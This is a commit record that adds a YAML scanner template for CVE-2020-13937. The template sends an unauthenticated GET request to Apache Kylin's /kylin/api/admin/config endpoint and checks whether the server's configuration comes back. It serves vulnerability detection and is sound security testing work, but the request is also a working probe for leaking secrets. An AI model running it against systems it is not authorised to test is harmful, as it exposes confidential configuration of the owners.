Merge pull request #775 from pikpikcu/patch-27

Added CVE-2020-13937 Apache kylin
2021-01-30 11:40:07 +05:30 · 2021-01-30 11:40:07 +05:30 · 7a4f0b26a9
parent 01d094e8e9 8bd790f98d
commit 7a4f0b26a9
1 changed files with 40 additions and 0 deletions
--- a/cves/2020/CVE-2020-13937.yaml
+++ b/cves/2020/CVE-2020-13937.yaml
@ -0,0 +1,40 @@
+id: CVE-2020-13937
+
+info:
+  name: Apache Kylin Unauth
+  author: pikpikcu
+  severity: medium
+  description: |
+              Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
+              2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4,
+              2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,
+              3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
+              Kylin's configuration information without any authentication,
+              so it is dangerous because some confidential information entries will be disclosed to everyone.
+
+  # References:
+  # https://s.tencent.com/research/bsafe/1156.html
+  # https://nvd.nist.gov/vuln/detail/CVE-2020-13937
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/kylin/api/admin/config"
+    headers:
+      Content-Type: application/json
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "application/json"
+        condition: and
+        part: header
+      - type: word
+        words:
+          - "config"
+        condition: and
+        part: body